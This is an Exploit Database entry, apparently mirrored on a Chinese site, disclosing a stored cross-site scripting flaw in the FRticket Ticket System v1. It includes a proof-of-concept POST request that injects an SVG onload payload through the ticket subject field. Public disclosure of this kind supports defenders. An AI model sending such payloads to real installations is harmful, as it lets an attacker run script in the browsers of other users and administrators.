FRticket Ticket System – Persistent Cross-Site Scripting

• Exploit Database
• 113 阅读

• 作者： Hamit Abis
  日期： 2016-06-13
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/39931/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50

  # Exploit Title: FRticket - Ticket System - Stored XSS # Google Dork: [if applicable] # Date: 11.06.2016 # Exploit Author: Hamit ABİŞ # Vendor Homepage: http://codecanyon.net/item/frticket-ticket-system/16539836 # Version: v1   #########################################################################################################   About     Get the world’s most popular customer support ticket system. FRticket is basically a management of enquiries between customers , agents and admins     Features:     - Admin Panel Dashboard   - Email Templates   - Agent Assignment   - Status Management   - Priority Management   - Categories Management   - And More Coming Soon…     #########################################################################################################     ########################################################################################################## Proof of Concept - Stored Ticket Title   POST /ticket/public/ticket HTTP/1.1 Host: server User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04 Connection: keep-alive _token=3XSACg1vDJQgzFCkVGk7nqE0HMOPlsuo7sbj5Z2y&subject=<svg onload=prompt(1)>&priority=2&category=2&description=somecomments   ##########################################################################################################     Twitter: https://twitter.com/sar1nz